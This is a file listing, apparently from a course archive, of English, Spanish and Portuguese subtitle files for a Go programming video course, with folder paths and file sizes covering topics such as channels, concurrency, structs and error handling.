    21 Exercises - Ninja Level 9/154 Hands-on exercise 7-es.srt 9.72 KB
    21 Exercises - Ninja Level 9/154 Hands-on exercise 7-en.srt 9.72 KB
    03 Your development environment/007 The terminal-pt.srt 9.71 KB
    16 Pointers/126 Method sets-es.srt 9.69 KB
    04 Variables values type/027 Conversion not casting-es.srt 9.65 KB
    16 Pointers/126 Method sets-pt.srt 9.64 KB
    21 Exercises - Ninja Level 9/154 Hands-on exercise 7-pt.srt 9.63 KB
    16 Pointers/126 Method sets-en.srt 9.62 KB
    02 Course Overview/005 Documentation-pt.srt 9.61 KB
    22 Channels/162 Fan out-es.srt 9.6 KB
    04 Variables values type/027 Conversion not casting-en.srt 9.6 KB
    39 Data Structures - Array/283 Data Structures Overview-es.srt 9.59 KB
    46 Applied Concurrency/338 Incrementor With Channels-en.srt 9.57 KB
    49 Error Handling/361 Custom Errors - Creating Values of Type error-pt.srt 9.57 KB
    49 Error Handling/361 Custom Errors - Creating Values of Type error-en.srt 9.55 KB
    04 Variables values type/027 Conversion not casting-pt.srt 9.55 KB
    22 Channels/162 Fan out-en.srt 9.51 KB
    22 Channels/162 Fan out-pt.srt 9.45 KB
    15 Exercises - Ninja Level 6/121 Hands-on exercise 9-en.srt 9.45 KB
    46 Applied Concurrency/338 Incrementor With Channels-es.srt 9.43 KB
    42 Data Structures - Struct/304 Structs Introduction-en.srt 9.41 KB
    46 Applied Concurrency/338 Incrementor With Channels-pt.srt 9.4 KB
    15 Exercises - Ninja Level 6/121 Hands-on exercise 9-es.srt 9.38 KB
    39 Data Structures - Array/283 Data Structures Overview-en.srt 9.38 KB
    37 Control Flow/258 Rune-en.srt 9.35 KB
    15 Exercises - Ninja Level 6/121 Hands-on exercise 9-pt.srt 9.34 KB
    42 Data Structures - Struct/304 Structs Introduction-es.srt 9.34 KB
    39 Data Structures - Array/283 Data Structures Overview-pt.srt 9.33 KB
    42 Data Structures - Struct/304 Structs Introduction-pt.srt 9.32 KB
    33 Installing Go/203 The Terminal-es.srt 9.32 KB
    38 Functions/269 Func Expressions-en.srt 9.3 KB
    38 Functions/280 Exercises - Part II-en.srt 9.29 KB
    38 Functions/280 Exercises - Part II-es.srt 9.28 KB
    33 Installing Go/203 The Terminal-pt.srt 9.26 KB
    37 Control Flow/258 Rune-pt.srt 9.25 KB
    37 Control Flow/258 Rune-es.srt 9.23 KB
    08 Control flow/054 Loop - printing ascii-pt.srt 9.22 KB
    08 Control flow/054 Loop - printing ascii-en.srt 9.21 KB
    34 Your Development Environment/221 The Go Command Documentation-es.srt 9.2 KB
    08 Control flow/053 Loop - break continue-en.srt 9.18 KB
    08 Control flow/054 Loop - printing ascii-es.srt 9.17 KB
    38 Functions/269 Func Expressions-es.srt 9.16 KB
    15 Exercises - Ninja Level 6/115 Hands-on exercise 3-es.srt 9.13 KB
    42 Data Structures - Struct/311 JSON Decode-pt.srt 9.13 KB
    45 Channels/331 Range Clause-en.srt 9.12 KB
    34 Your Development Environment/221 The Go Command Documentation-en.srt 9.1 KB
    03 Your development environment/012 Go workspace-es.srt 9.1 KB
    42 Data Structures - Struct/311 JSON Decode-es.srt 9.08 KB
    19 Exercises - Ninja Level 8/137 Hands-on exercise 2-es.srt 9.08 KB
    08 Control flow/053 Loop - break continue-es.srt 9.08 KB
    46 Applied Concurrency/342 Factorial Challenge Redux-en.srt 9.07 KB
    38 Functions/280 Exercises - Part II-pt.srt 9.06 KB
    15 Exercises - Ninja Level 6/115 Hands-on exercise 3-pt.srt 9.06 KB
    45 Channels/331 Range Clause-es.srt 9.06 KB
    36 Language Fundamentals/238 Go Commands-es.srt 9.05 KB
    33 Installing Go/203 The Terminal-en.srt 9.05 KB
    15 Exercises - Ninja Level 6/115 Hands-on exercise 3-en.srt 9.04 KB
    34 Your Development Environment/221 The Go Command Documentation-pt.srt 9.02 KB
    36 Language Fundamentals/238 Go Commands-en.srt 9.02 KB
    46 Applied Concurrency/342 Factorial Challenge Redux-es.srt 9.01 KB
    36 Language Fundamentals/238 Go Commands-pt.srt 9.01 KB
    19 Exercises - Ninja Level 8/137 Hands-on exercise 2-pt.srt 9 KB
    19 Exercises - Ninja Level 8/137 Hands-on exercise 2-en.srt 8.99 KB
    42 Data Structures - Struct/311 JSON Decode-en.srt 8.97 KB
    46 Applied Concurrency/342 Factorial Challenge Redux-pt.srt 8.97 KB
    03 Your development environment/012 Go workspace-pt.srt 8.96 KB
    08 Control flow/053 Loop - break continue-pt.srt 8.95 KB
    38 Functions/269 Func Expressions-pt.srt 8.92 KB
    45 Channels/331 Range Clause-pt.srt 8.91 KB
    03 Your development environment/012 Go workspace-en.srt 8.77 KB
    30 Farewell/198 Farewell-en.srt 8.71 KB
    38 Functions/270 Closure-en.srt 8.71 KB
    38 Functions/270 Closure-es.srt 8.67 KB
    47 Concurrency Challenges/354 Incrementor Solution-en.srt 8.65 KB
    30 Farewell/198 Farewell-es.srt 8.64 KB
    36 Language Fundamentals/236 Section Overview-en.srt 8.64 KB
    14 Functions/105 Methods-es.srt 8.62 KB
    30 Farewell/198 Farewell-pt.srt 8.62 KB
    45 Channels/337 Channel Direction-en.srt 8.6 KB
    15 Exercises - Ninja Level 6/123 Hands-on exercise 11-es.srt 8.57 KB
    38 Functions/270 Closure-pt.srt 8.57 KB
    14 Functions/105 Methods-en.srt 8.52 KB
    14 Functions/105 Methods-pt.srt 8.49 KB
    45 Channels/337 Channel Direction-pt.srt 8.48 KB
    15 Exercises - Ninja Level 6/123 Hands-on exercise 11-pt.srt 8.47 KB
    45 Channels/337 Channel Direction-es.srt 8.43 KB
    14 Functions/104 Defer-es.srt 8.43 KB
    14 Functions/104 Defer-pt.srt 8.41 KB
    15 Exercises - Ninja Level 6/123 Hands-on exercise 11-en.srt 8.37 KB
    14 Functions/104 Defer-en.srt 8.36 KB
    04 Variables values type/026 Creating your own type-es.srt 8.35 KB
    22 Channels/157 Using channels-en.srt 8.34 KB
    22 Channels/157 Using channels-es.srt 8.32 KB
    36 Language Fundamentals/251 Remainder-en.srt 8.32 KB
    11 Exercises - Ninja Level 4/087 Hands-on exercise 6-en.srt 8.31 KB
    18 Application/130 JSON marshal-es.srt 8.28 KB
    21 Exercises - Ninja Level 9/153 Hands-on exercise 6-pt.srt 8.27 KB
    36 Language Fundamentals/251 Remainder-pt.srt 8.27 KB
    36 Language Fundamentals/251 Remainder-es.srt 8.26 KB
    12 Structs/093 Embedded structs-es.srt 8.25 KB
    11 Exercises - Ninja Level 4/087 Hands-on exercise 6-es.srt 8.25 KB
    21 Exercises - Ninja Level 9/153 Hands-on exercise 6-en.srt 8.25 KB
    21 Exercises - Ninja Level 9/153 Hands-on exercise 6-es.srt 8.24 KB
    18 Application/130 JSON marshal-pt.srt 8.23 KB
    04 Variables values type/026 Creating your own type-pt.srt 8.21 KB
    11 Exercises - Ninja Level 4/086 Hands-on exercise 5-en.srt 8.2 KB
    22 Channels/157 Using channels-pt.srt 8.2 KB
    45 Channels/332 N-to-1-es.srt 8.16 KB
    18 Application/130 JSON marshal-en.srt 8.16 KB
    20 Concurrency/147 Atomic-es.srt 8.15 KB
    11 Exercises - Ninja Level 4/086 Hands-on exercise 5-es.srt 8.15 KB
    04 Variables values type/026 Creating your own type-en.srt 8.15 KB
    49 Error Handling/358 Improving Your Code with Golint-pt.srt 8.13 KB
    38 Functions/272 Callback Example-en.srt 8.12 KB
    20 Concurrency/147 Atomic-en.srt 8.09 KB
    38 Functions/272 Callback Example-es.srt 8.09 KB
    11 Exercises - Ninja Level 4/087 Hands-on exercise 6-pt.srt 8.08 KB
    12 Structs/093 Embedded structs-en.srt 8.08 KB
    20 Concurrency/147 Atomic-pt.srt 8.07 KB
    49 Error Handling/358 Improving Your Code with Golint-es.srt 8.07 KB
    12 Structs/093 Embedded structs-pt.srt 8.07 KB
    45 Channels/332 N-to-1-en.srt 8.07 KB
    11 Exercises - Ninja Level 4/086 Hands-on exercise 5-pt.srt 8.06 KB
    38 Functions/272 Callback Example-pt.srt 8.05 KB
    45 Channels/332 N-to-1-pt.srt 8.04 KB
    38 Functions/266 Func Returns-en.srt 7.99 KB
    05 Exercises - Ninja Level 1/028 Hands-on exercise 1-es.srt 7.98 KB
    49 Error Handling/358 Improving Your Code with Golint-en.srt 7.98 KB
    20 Concurrency/141 Concurrency vs parallelism-es.srt 7.96 KB
    38 Functions/266 Func Returns-es.srt 7.96 KB
    09 Exercises - Ninja Level 3/070 Hands-on exercise 10-pt.srt 7.95 KB
    20 Concurrency/141 Concurrency vs parallelism-en.srt 7.94 KB
    05 Exercises - Ninja Level 1/028 Hands-on exercise 1-en.srt 7.93 KB
    38 Functions/266 Func Returns-pt.srt 7.91 KB
    25 Exercises - Ninja Level 11/179 Hands-on exercise 4-es.srt 7.91 KB
    09 Exercises - Ninja Level 3/070 Hands-on exercise 10-es.srt 7.88 KB
    23 Exercises - Ninja Level 10/167 Hands-on exercise 4-es.srt 7.85 KB
    38 Functions/268 Variadic Arguments-en.srt 7.84 KB
    25 Exercises - Ninja Level 11/179 Hands-on exercise 4-pt.srt 7.83 KB
    25 Exercises - Ninja Level 11/179 Hands-on exercise 4-en.srt 7.83 KB
    38 Functions/268 Variadic Arguments-es.srt 7.83 KB
    26 Writing documentation/184 godoc.org-en.srt 7.81 KB
    23 Exercises - Ninja Level 10/167 Hands-on exercise 4-en.srt 7.81 KB
    05 Exercises - Ninja Level 1/028 Hands-on exercise 1-pt.srt 7.8 KB
    20 Concurrency/141 Concurrency vs parallelism-pt.srt 7.8 KB
    38 Functions/268 Variadic Arguments-pt.srt 7.79 KB
    41 Data Structures - Map/295 Map Examples - Part III-es.srt 7.77 KB
    09 Exercises - Ninja Level 3/070 Hands-on exercise 10-en.srt 7.75 KB
    26 Writing documentation/184 godoc.org-pt.srt 7.73 KB
    40 Data Structures - Slice/290 Incrementing A Slice Item-es.srt 7.73 KB
    49 Error Handling/360 Four Common Ways to Handle Errors-es.srt 7.72 KB
    17 Exercises - Ninja Level 7/128 Hands-on exercise 2-es.srt 7.72 KB
    41 Data Structures - Map/295 Map Examples - Part III-en.srt 7.72 KB
    40 Data Structures - Slice/290 Incrementing A Slice Item-en.srt 7.7 KB
    17 Exercises - Ninja Level 7/128 Hands-on exercise 2-pt.srt 7.7 KB
    10 Grouping data/072 Slice - composite literal-es.srt 7.7 KB
    40 Data Structures - Slice/290 Incrementing A Slice Item-pt.srt 7.7 KB
    44 Concurrency/324 Concurrency WaitGroup-es.srt 7.69 KB
    41 Data Structures - Map/295 Map Examples - Part III-pt.srt 7.67 KB
    23 Exercises - Ninja Level 10/167 Hands-on exercise 4-pt.srt 7.67 KB
    17 Exercises - Ninja Level 7/128 Hands-on exercise 2-en.srt 7.66 KB
    26 Writing documentation/184 godoc.org-es.srt 7.63 KB
    44 Concurrency/324 Concurrency WaitGroup-en.srt 7.62 KB
    46 Applied Concurrency/340 Factorial Challenge-en.srt 7.59 KB
    44 Concurrency/324 Concurrency WaitGroup-pt.srt 7.59 KB
    49 Error Handling/357 An Introduction to Error Handling in Go-pt.srt 7.57 KB
    46 Applied Concurrency/340 Factorial Challenge-es.srt 7.57 KB
    46 Applied Concurrency/340 Factorial Challenge-pt.srt 7.55 KB
    10 Grouping data/072 Slice - composite literal-en.srt 7.53 KB
    10 Grouping data/072 Slice - composite literal-pt.srt 7.53 KB
    05 Exercises - Ninja Level 1/031 Hands-on exercise 4-es.srt 7.53 KB
    46 Applied Concurrency/343 Factorial Challenge Redux Solution-en.srt 7.52 KB
    49 Error Handling/357 An Introduction to Error Handling in Go-en.srt 7.5 KB
    38 Functions/276 Reference Types-es.srt 7.5 KB
    38 Functions/276 Reference Types-en.srt 7.49 KB
    18 Application/133 Sort-pt.srt 7.48 KB
    49 Error Handling/360 Four Common Ways to Handle Errors-pt.srt 7.48 KB
    05 Exercises - Ninja Level 1/031 Hands-on exercise 4-en.srt 7.45 KB
    49 Error Handling/357 An Introduction to Error Handling in Go-es.srt 7.45 KB
    49 Error Handling/360 Four Common Ways to Handle Errors-en.srt 7.41 KB
    18 Application/133 Sort-es.srt 7.41 KB
    48 Concurrency Resources/355 Additional Resources-es.srt 7.41 KB
    38 Functions/276 Reference Types-pt.srt 7.39 KB
    05 Exercises - Ninja Level 1/031 Hands-on exercise 4-pt.srt 7.39 KB
    46 Applied Concurrency/343 Factorial Challenge Redux Solution-es.srt 7.38 KB
    19 Exercises - Ninja Level 8/138 Hands-on exercise 3-es.srt 7.38 KB
    10 Grouping data/075 Slice - append to a slice-es.srt 7.33 KB
    15 Exercises - Ninja Level 6/116 Hands-on exercise 4-en.srt 7.33 KB
    46 Applied Concurrency/343 Factorial Challenge Redux Solution-pt.srt 7.32 KB
    15 Exercises - Ninja Level 6/116 Hands-on exercise 4-es.srt 7.31 KB
    44 Concurrency/325 Parallelism-pt.srt 7.28 KB
    44 Concurrency/325 Parallelism-es.srt 7.28 KB
    10 Grouping data/076 Slice - deleting from a slice-es.srt 7.26 KB
    15 Exercises - Ninja Level 6/116 Hands-on exercise 4-pt.srt 7.25 KB
    48 Concurrency Resources/355 Additional Resources-pt.srt 7.25 KB
    19 Exercises - Ninja Level 8/138 Hands-on exercise 3-pt.srt 7.24 KB
    18 Application/133 Sort-en.srt 7.23 KB
    10 Grouping data/076 Slice - deleting from a slice-en.srt 7.22 KB
    10 Grouping data/075 Slice - append to a slice-en.srt 7.22 KB
    48 Concurrency Resources/355 Additional Resources-en.srt 7.18 KB
    10 Grouping data/076 Slice - deleting from a slice-pt.srt 7.14 KB
    44 Concurrency/325 Parallelism-en.srt 7.12 KB
    19 Exercises - Ninja Level 8/138 Hands-on exercise 3-en.srt 7.11 KB
    10 Grouping data/075 Slice - append to a slice-pt.srt 7.11 KB
    36 Language Fundamentals/244 Blank Identifier-en.srt 7.01 KB
    36 Language Fundamentals/244 Blank Identifier-es.srt 7 KB
    36 Language Fundamentals/244 Blank Identifier-pt.srt 6.99 KB
    10 Grouping data/071 Array-es.srt 6.94 KB
    49 Error Handling/363 Providing Context with Errors-es.srt 6.91 KB
    49 Error Handling/363 Providing Context with Errors-pt.srt 6.86 KB
    14 Functions/107 Anonymous func-en.srt 6.86 KB
    14 Functions/107 Anonymous func-es.srt 6.84 KB
    49 Error Handling/363 Providing Context with Errors-en.srt 6.82 KB
    38 Functions/273 Recursion-en.srt 6.82 KB
    14 Functions/107 Anonymous func-pt.srt 6.81 KB
    38 Functions/273 Recursion-es.srt 6.8 KB
    45 Channels/335 1-to-N-en.srt 6.79 KB
    20 Concurrency/146 Mutex-es.srt 6.78 KB
    20 Concurrency/146 Mutex-en.srt 6.77 KB
    28 Testing benchmarking/190 Golint-es.srt 6.77 KB
    20 Concurrency/146 Mutex-pt.srt 6.74 KB
    49 Error Handling/365 Error Handling Review Resources-es.srt 6.71 KB
    28 Testing benchmarking/190 Golint-pt.srt 6.69 KB
    38 Functions/273 Recursion-pt.srt 6.69 KB
    28 Testing benchmarking/190 Golint-en.srt 6.66 KB
    10 Grouping data/071 Array-en.srt 6.66 KB
    10 Grouping data/071 Array-pt.srt 6.65 KB
    41 Data Structures - Map/298 GitHub Pull-pt.srt 6.62 KB
    41 Data Structures - Map/298 GitHub Pull-es.srt 6.62 KB
    49 Error Handling/365 Error Handling Review Resources-pt.srt 6.61 KB
    08 Control flow/050 Loop - init condition post-en.srt 6.58 KB
    41 Data Structures - Map/298 GitHub Pull-en.srt 6.55 KB
    45 Channels/335 1-to-N-pt.srt 6.55 KB
    45 Channels/335 1-to-N-es.srt 6.54 KB
    49 Error Handling/365 Error Handling Review Resources-en.srt 6.52 KB
    21 Exercises - Ninja Level 9/152 Hands-on exercise 5-pt.srt 6.5 KB
    33 Installing Go/214 Section Review-es.srt 6.49 KB
    33 Installing Go/214 Section Review-pt.srt 6.48 KB
    08 Control flow/050 Loop - init condition post-es.srt 6.48 KB
    10 Grouping data/074 Slice - slicing a slice-es.srt 6.45 KB
    08 Control flow/050 Loop - init condition post-pt.srt 6.44 KB
    33 Installing Go/213 Testing Your Installation-es.srt 6.43 KB
    21 Exercises - Ninja Level 9/152 Hands-on exercise 5-en.srt 6.42 KB
    21 Exercises - Ninja Level 9/152 Hands-on exercise 5-es.srt 6.42 KB
    33 Installing Go/213 Testing Your Installation-pt.srt 6.39 KB
    33 Installing Go/213 Testing Your Installation-en.srt 6.39 KB
    22 Channels/158 Range-en.srt 6.38 KB
    10 Grouping data/074 Slice - slicing a slice-en.srt 6.36 KB
    44 Concurrency/326 Race Conditions-pt.srt 6.33 KB
    22 Channels/158 Range-es.srt 6.31 KB
    35 Computer Fundamentals/229 Numeral Systems-es.srt 6.31 KB
    44 Concurrency/328 Atomicity-pt.srt 6.3 KB
    33 Installing Go/214 Section Review-en.srt 6.29 KB
    22 Channels/158 Range-pt.srt 6.27 KB
    35 Computer Fundamentals/229 Numeral Systems-pt.srt 6.25 KB
    44 Concurrency/328 Atomicity-es.srt 6.24 KB
    44 Concurrency/326 Race Conditions-es.srt 6.23 KB
    44 Concurrency/326 Race Conditions-en.srt 6.22 KB
    35 Computer Fundamentals/229 Numeral Systems-en.srt 6.2 KB
    10 Grouping data/074 Slice - slicing a slice-pt.srt 6.17 KB
    44 Concurrency/328 Atomicity-en.srt 6.11 KB
    27 Exercises - Ninja Level 12/186 Hands-on exercise 1-es.srt 6.09 KB
    34 Your Development Environment/224 Section Review-en.srt 6.04 KB
    38 Functions/274 Defer-es.srt 5.93 KB
    47 Concurrency Challenges/352 Deadlock Solution-en.srt 5.93 KB
    27 Exercises - Ninja Level 12/186 Hands-on exercise 1-pt.srt 5.92 KB
    27 Exercises - Ninja Level 12/186 Hands-on exercise 1-en.srt 5.91 KB
    47 Concurrency Challenges/352 Deadlock Solution-es.srt 5.9 KB
    15 Exercises - Ninja Level 6/114 Hands-on exercise 2-es.srt 5.84 KB
    19 Exercises - Ninja Level 8/136 Hands-on exercise 1-es.srt 5.84 KB
    19 Exercises - Ninja Level 8/136 Hands-on exercise 1-en.srt 5.83 KB
    44 Concurrency/327 Mutex-es.srt 5.83 KB
    38 Functions/274 Defer-en.srt 5.82 KB
    21 Exercises - Ninja Level 9/151 Hands-on exercise 4-es.srt 5.81 KB
    15 Exercises - Ninja Level 6/114 Hands-on exercise 2-en.srt 5.81 KB
    44 Concurrency/327 Mutex-pt.srt 5.8 KB
    13 Exercises - Ninja Level 5/098 Hands-on exercise 2-es.srt 5.79 KB
    21 Exercises - Ninja Level 9/151 Hands-on exercise 4-pt.srt 5.76 KB
    15 Exercises - Ninja Level 6/114 Hands-on exercise 2-pt.srt 5.76 KB
    47 Concurrency Challenges/352 Deadlock Solution-pt.srt 5.73 KB
    38 Functions/274 Defer-pt.srt 5.73 KB
    44 Concurrency/327 Mutex-en.srt 5.71 KB
    11 Exercises - Ninja Level 4/089 Hands-on exercise 8-es.srt 5.71 KB
    19 Exercises - Ninja Level 8/136 Hands-on exercise 1-pt.srt 5.71 KB
    13 Exercises - Ninja Level 5/098 Hands-on exercise 2-en.srt 5.69 KB
    11 Exercises - Ninja Level 4/089 Hands-on exercise 8-en.srt 5.69 KB
    13 Exercises - Ninja Level 5/098 Hands-on exercise 2-pt.srt 5.64 KB
    11 Exercises - Ninja Level 4/089 Hands-on exercise 8-pt.srt 5.63 KB
    21 Exercises - Ninja Level 9/151 Hands-on exercise 4-en.srt 5.62 KB
    36 Language Fundamentals/247 Words of Encouragement-en.srt 5.62 KB
    41 Data Structures - Map/297 Map Range Loop-es.srt 5.61 KB
    36 Language Fundamentals/247 Words of Encouragement-es.srt 5.6 KB
    36 Language Fundamentals/247 Words of Encouragement-pt.srt 5.6 KB
    25 Exercises - Ninja Level 11/176 Hands-on exercise 1-es.srt 5.59 KB
    12 Structs/092 Struct-es.srt 5.57 KB
    08 Control flow/051 Loop - nesting loops-es.srt 5.56 KB
    08 Control flow/051 Loop - nesting loops-en.srt 5.56 KB
    41 Data Structures - Map/297 Map Range Loop-pt.srt 5.52 KB
    08 Control flow/051 Loop - nesting loops-pt.srt 5.49 KB
    41 Data Structures - Map/297 Map Range Loop-en.srt 5.49 KB
    04 Variables values type/024 Zero value-es.srt 5.48 KB
    12 Structs/092 Struct-pt.srt 5.47 KB
    04 Variables values type/024 Zero value-pt.srt 5.47 KB
    04 Variables values type/024 Zero value-en.srt 5.47 KB
    11 Exercises - Ninja Level 4/084 Hands-on exercise 3-en.srt 5.45 KB
    25 Exercises - Ninja Level 11/176 Hands-on exercise 1-pt.srt 5.43 KB
    25 Exercises - Ninja Level 11/176 Hands-on exercise 1-en.srt 5.42 KB
    10 Grouping data/080 Map - add element range-pt.srt 5.42 KB
    06 Programming fundamentals/039 Constants-pt.srt 5.41 KB
    12 Structs/092 Struct-en.srt 5.41 KB
    06 Programming fundamentals/039 Constants-es.srt 5.4 KB
    10 Grouping data/080 Map - add element range-es.srt 5.4 KB
    11 Exercises - Ninja Level 4/084 Hands-on exercise 3-es.srt 5.39 KB
    06 Programming fundamentals/039 Constants-en.srt 5.35 KB
    10 Grouping data/080 Map - add element range-en.srt 5.32 KB
    11 Exercises - Ninja Level 4/084 Hands-on exercise 3-pt.srt 5.29 KB
    14 Functions/108 func expression-es.srt 5.28 KB
    46 Applied Concurrency/344 Fan Out Fan In Pattern - Overview-en.srt 5.27 KB
    13 Exercises - Ninja Level 5/097 Hands-on exercise 1-es.srt 5.26 KB
    49 Error Handling/362 Idiomatic Error Handling-es.srt 5.26 KB
    46 Applied Concurrency/344 Fan Out Fan In Pattern - Overview-es.srt 5.25 KB
    33 Installing Go/202 Section Overview-es.srt 5.21 KB
    43 Interfaces/312 Interfaces Introduction-pt.srt 5.21 KB
    49 Error Handling/362 Idiomatic Error Handling-pt.srt 5.21 KB
    46 Applied Concurrency/344 Fan Out Fan In Pattern - Overview-pt.srt 5.2 KB
    13 Exercises - Ninja Level 5/097 Hands-on exercise 1-en.srt 5.19 KB
    13 Exercises - Ninja Level 5/097 Hands-on exercise 1-pt.srt 5.16 KB
    14 Functions/108 func expression-pt.srt 5.16 KB
    15 Exercises - Ninja Level 6/119 Hands-on exercise 7-es.srt 5.15 KB
    43 Interfaces/312 Interfaces Introduction-en.srt 5.15 KB
    15 Exercises - Ninja Level 6/119 Hands-on exercise 7-pt.srt 5.14 KB
    49 Error Handling/362 Idiomatic Error Handling-en.srt 5.13 KB
    15 Exercises - Ninja Level 6/119 Hands-on exercise 7-en.srt 5.12 KB
    43 Interfaces/320 Sort Slice Int-es.srt 5.12 KB
    14 Functions/108 func expression-en.srt 5.11 KB
    43 Interfaces/320 Sort Slice Int-en.srt 5.11 KB
    23 Exercises - Ninja Level 10/164 Hands-on exercise 1-es.srt 5.11 KB
    33 Installing Go/202 Section Overview-pt.srt 5.09 KB
    23 Exercises - Ninja Level 10/164 Hands-on exercise 1-en.srt 5.09 KB
    43 Interfaces/312 Interfaces Introduction-es.srt 5.07 KB
    23 Exercises - Ninja Level 10/166 Hands-on exercise 3-es.srt 5.06 KB
    23 Exercises - Ninja Level 10/166 Hands-on exercise 3-en.srt 5.05 KB
    23 Exercises - Ninja Level 10/164 Hands-on exercise 1-pt.srt 5.05 KB
    43 Interfaces/320 Sort Slice Int-pt.srt 5.03 KB
    33 Installing Go/202 Section Overview-en.srt 5.02 KB
    08 Control flow/060 Conditional logic operators-pt.srt 4.99 KB
    08 Control flow/057 Loop conditional modulus-es.srt 4.99 KB
    08 Control flow/060 Conditional logic operators-es.srt 4.98 KB
    10 Grouping data/073 Slice - for range-es.srt 4.96 KB
    23 Exercises - Ninja Level 10/166 Hands-on exercise 3-pt.srt 4.96 KB
    08 Control flow/057 Loop conditional modulus-en.srt 4.94 KB
    11 Exercises - Ninja Level 4/085 Hands-on exercise 4-en.srt 4.92 KB
    08 Control flow/057 Loop conditional modulus-pt.srt 4.89 KB
    10 Grouping data/078 Slice - multi-dimensional slice-en.srt 4.89 KB
    10 Grouping data/078 Slice - multi-dimensional slice-es.srt 4.87 KB
    08 Control flow/060 Conditional logic operators-en.srt 4.87 KB
    11 Exercises - Ninja Level 4/085 Hands-on exercise 4-es.srt 4.85 KB
    10 Grouping data/073 Slice - for range-en.srt 4.84 KB
    10 Grouping data/073 Slice - for range-pt.srt 4.83 KB
    11 Exercises - Ninja Level 4/085 Hands-on exercise 4-pt.srt 4.8 KB
    12 Structs/095 Anonymous structs-es.srt 4.8 KB
    12 Structs/095 Anonymous structs-en.srt 4.78 KB
    42 Data Structures - Struct/309 JSON Unmarshal-pt.srt 4.75 KB
    42 Data Structures - Struct/309 JSON Unmarshal-es.srt 4.75 KB
    12 Structs/095 Anonymous structs-pt.srt 4.74 KB
    10 Grouping data/078 Slice - multi-dimensional slice-pt.srt 4.74 KB
    42 Data Structures - Struct/309 JSON Unmarshal-en.srt 4.71 KB
    23 Exercises - Ninja Level 10/169 Hands-on exercise 6-en.srt 4.53 KB
    23 Exercises - Ninja Level 10/169 Hands-on exercise 6-es.srt 4.47 KB
    23 Exercises - Ninja Level 10/169 Hands-on exercise 6-pt.srt 4.34 KB
    05 Exercises - Ninja Level 1/032 Hands-on exercise 5-es.srt 4.34 KB
    05 Exercises - Ninja Level 1/032 Hands-on exercise 5-en.srt 4.33 KB
    23 Exercises - Ninja Level 10/168 Hands-on exercise 5-en.srt 4.28 KB
    05 Exercises - Ninja Level 1/032 Hands-on exercise 5-pt.srt 4.25 KB
    15 Exercises - Ninja Level 6/122 Hands-on exercise 10-en.srt 4.24 KB
    15 Exercises - Ninja Level 6/122 Hands-on exercise 10-es.srt 4.24 KB
    05 Exercises - Ninja Level 1/029 Hands-on exercise 2-en.srt 4.2 KB
    05 Exercises - Ninja Level 1/029 Hands-on exercise 2-es.srt 4.19 KB
    23 Exercises - Ninja Level 10/168 Hands-on exercise 5-es.srt 4.17 KB
    15 Exercises - Ninja Level 6/122 Hands-on exercise 10-pt.srt 4.15 KB
    05 Exercises - Ninja Level 1/029 Hands-on exercise 2-pt.srt 4.14 KB
    23 Exercises - Ninja Level 10/168 Hands-on exercise 5-pt.srt 4.14 KB
    10 Grouping data/081 Map - delete-en.srt 4.13 KB
    10 Grouping data/081 Map - delete-pt.srt 4.12 KB
    10 Grouping data/081 Map - delete-es.srt 4.11 KB
    13 Exercises - Ninja Level 5/100 Hands-on exercise 4-es.srt 4.09 KB
    07 Exercises - Ninja Level 2/043 Hands-on exercise 2-en.srt 4.05 KB
    13 Exercises - Ninja Level 5/100 Hands-on exercise 4-pt.srt 4.03 KB
    07 Exercises - Ninja Level 2/043 Hands-on exercise 2-es.srt 4.01 KB
    07 Exercises - Ninja Level 2/043 Hands-on exercise 2-pt.srt 4 KB
    13 Exercises - Ninja Level 5/100 Hands-on exercise 4-en.srt 3.98 KB
    13 Exercises - Ninja Level 5/099 Hands-on exercise 3-es.srt 3.8 KB
    13 Exercises - Ninja Level 5/099 Hands-on exercise 3-en.srt 3.78 KB
    09 Exercises - Ninja Level 3/065 Hands-on exercise 5-pt.srt 3.75 KB
    13 Exercises - Ninja Level 5/099 Hands-on exercise 3-pt.srt 3.74 KB
    09 Exercises - Ninja Level 3/065 Hands-on exercise 5-es.srt 3.74 KB
    09 Exercises - Ninja Level 3/065 Hands-on exercise 5-en.srt 3.71 KB
    23 Exercises - Ninja Level 10/165 Hands-on exercise 2-es.srt 3.67 KB
    23 Exercises - Ninja Level 10/165 Hands-on exercise 2-pt.srt 3.67 KB
    11 Exercises - Ninja Level 4/082 Hands-on exercise 1-en.srt 3.62 KB
    06 Programming fundamentals/040 Iota-es.srt 3.61 KB
    23 Exercises - Ninja Level 10/165 Hands-on exercise 2-en.srt 3.61 KB
    06 Programming fundamentals/040 Iota-pt.srt 3.59 KB
    06 Programming fundamentals/040 Iota-en.srt 3.59 KB
    05 Exercises - Ninja Level 1/030 Hands-on exercise 3-es.srt 3.58 KB
    05 Exercises - Ninja Level 1/030 Hands-on exercise 3-pt.srt 3.58 KB
    11 Exercises - Ninja Level 4/082 Hands-on exercise 1-es.srt 3.55 KB
    11 Exercises - Ninja Level 4/082 Hands-on exercise 1-pt.srt 3.55 KB
    05 Exercises - Ninja Level 1/030 Hands-on exercise 3-en.srt 3.54 KB
    35 Computer Fundamentals/225 Section Overview-es.srt 3.27 KB
    38 Functions/264 Section Overview-en.srt 3.26 KB
    15 Exercises - Ninja Level 6/120 Hands-on exercise 8-es.srt 3.23 KB
    38 Functions/264 Section Overview-es.srt 3.21 KB
    15 Exercises - Ninja Level 6/120 Hands-on exercise 8-pt.srt 3.21 KB
    35 Computer Fundamentals/225 Section Overview-en.srt 3.2 KB
    35 Computer Fundamentals/225 Section Overview-pt.srt 3.19 KB
    15 Exercises - Ninja Level 6/120 Hands-on exercise 8-en.srt 3.17 KB
    38 Functions/264 Section Overview-pt.srt 3.11 KB
    47 Concurrency Challenges/349 Fan Out Fan In - Challenge Factorial-en.srt 3.09 KB
    47 Concurrency Challenges/349 Fan Out Fan In - Challenge Factorial-es.srt 3.08 KB
    07 Exercises - Ninja Level 2/045 Hands-on exercise 4-es.srt 3.05 KB
    34 Your Development Environment/215 Section Overview-es.srt 3.04 KB
    07 Exercises - Ninja Level 2/045 Hands-on exercise 4-en.srt 3 KB
    34 Your Development Environment/215 Section Overview-pt.srt 2.99 KB
    47 Concurrency Challenges/349 Fan Out Fan In - Challenge Factorial-pt.srt 2.99 KB
    34 Your Development Environment/215 Section Overview-en.srt 2.98 KB
    07 Exercises - Ninja Level 2/045 Hands-on exercise 4-pt.srt 2.97 KB
    08 Control flow/049 Understanding control flow-en.srt 2.96 KB
    08 Control flow/056 Conditional - if else if else-pt.srt 2.94 KB
    08 Control flow/049 Understanding control flow-pt.srt 2.92 KB
    08 Control flow/056 Conditional - if else if else-es.srt 2.91 KB
